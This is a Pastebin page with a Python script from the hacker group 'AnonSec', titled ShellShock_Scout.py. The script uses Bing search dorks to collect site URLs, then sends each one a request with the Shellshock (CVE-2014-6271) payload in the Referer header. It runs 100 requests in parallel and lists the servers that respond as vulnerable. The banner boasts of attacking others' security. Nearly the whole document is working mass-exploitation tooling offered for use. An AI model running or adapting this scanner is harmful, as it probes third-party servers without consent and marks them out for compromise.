Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # We are...
- # _____ _________
- # / _ \ ____ ____ ____ / _____/ ____ ____
- # / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
- # / | \ | ( <_> ) | \/ \ ___/\ \___
- # \____|__ /___| /\____/|___| /_______ /\___ >\___ >
- # \/ \/ \/ \/ \/ \/
- # //Laughing at your security since 2012*
- # ================================================================================================
- # Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r
- # - Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64
- # ================================================================================================
- #
- #
- # We are Anonsec
- # Beware of our Cyber-Mafia
- # We do not Forgive
- # We do not Forget
- # Expect Us
- #
- print "###########################################################"
- print "### ShellShock_Scout.py ###"
- print "### Mass Bing ShellShock Dork Scanner ###"
- print "### CVE-2014-6271 ###"
- print "### *************************************************** ###"
- print "### \!/Anonsec\!/ ###"
- print "### Laughing at your security since 2012* ###"
- print "### ###"
- print "### _.-''|''-._ ###"
- print "### .-' | `-. ###"
- print "### .'\ | /`. ###"
- print "### .' \ | / `. ###"
- print "### \ \ | / / ###"
- print "### `\ \ | / /' ###"
- print "### `\ \ | / /' ###"
- print "### `\ \ | / /' ###"
- print "### _.-`\ \ | / /'-._ ###"
- print "### ~~(8:> {_____`\\|//'______} ~~(8:> ###"
- print "### `-' ###"
- print "### twitter.com/_d3f4ult ###"
- print "###########################################################"
- from gevent import monkey
- monkey.patch_all()
- from gevent.pool import Pool
- from gevent import joinall
- import urllib
- import urllib2
- import argparse
- import sys
- import json
- import socket
- socket.setdefaulttimeout(60)
- VULN_FOUND = None
- def parse_args():
- #Create the arguments
- parser = argparse.ArgumentParser()
- parser.add_argument("-s", "--search", help="Search terms")
- parser.add_argument("-p", "--pages", default="1", help="Number of pages of results to fetch where there's 50 results per page; defaults to 1")
- parser.add_argument("-k", "--key", help="Your Bing API key found at https://datamarket.azure.com/account")
- return parser.parse_args()
- def bing_search(query, key, offset, **kwargs):
- #Make the search
- username = ''
- baseURL = 'https://api.datamarket.azure.com/Bing/Search/'
- query = urllib.quote(query)
- user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)'
- credentials = (':%s' % key).encode('base64')[:-1]
- auth = 'Basic %s' % credentials
- url = baseURL+'Web?Query=%27'+query+'%27&$top=50&$format=json&$skip='+offset
- print '[*] Scanning -> '+url
- password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
- password_mgr.add_password(None, url, username, key)
- handler = urllib2.HTTPBasicAuthHandler(password_mgr)
- opener = urllib2.build_opener(handler)
- urllib2.install_opener(opener)
- try:
- readURL = urllib2.urlopen(url, timeout=60).read()
- except Exception as e:
- sys.exit('[-] Failed to fetch bing results. Are you sure you have the right API key?\n Error: '+str(e))
- return readURL
- def action(result):
- #Make the payloaded request and check the response's headers for the echo msg
- global VULN_FOUND
- exploit = "() { :;}; echo 'Shellshock: Vulnerable'"
- ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'
- url = result['Url']
- req = urllib2.Request(url)
- req.add_header('User-Agent', ua)
- req.add_header('Referer', exploit)
- try:
- r = urllib2.urlopen(req, timeout=60)
- except Exception as e:
- return
- resp_headers = r.info()
- if 'shellshock' in r.info():
- VULN_FOUND = True
- print '[!] SHELLSHOCK VULNERABLE:', url
- return
- def result_concurrency(results):
- #Open all the greenlet threads
- in_parallel = 100
- pool = Pool(in_parallel)
- jobs = [pool.spawn(action, result) for result in results]
- return joinall(jobs)
- def main():
- args = parse_args()
- if not args.search:
- sys.exit('[!] Specify a search term, eg, ./shellshock_scout.py -s "dorks"')
- if not args.key:
- sys.exit('[!] Specify a Bing API key or get one here: https://datamarket.azure.com/dataset/bing/search')
- key = args.key
- if len(key) not in (44, 43):
- sys.exit('[-] Incorrect key length')
- query = args.search
- pages = int(args.pages)
- offset = 0
- total_results = []
- for x in xrange(pages):
- # Start off with offset = 0
- if x != 0:
- offset += 50
- response = bing_search(query, key, str(offset))
- results = json.loads(response)['d']['results']
- if len(results) == 0:
- print '[-] No more results found'
- break
- total_results += results
- print '[*] Checking each search result...'
- result_concurrency(total_results)
- if not VULN_FOUND:
- print '[-] No vulnerable sites found'
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement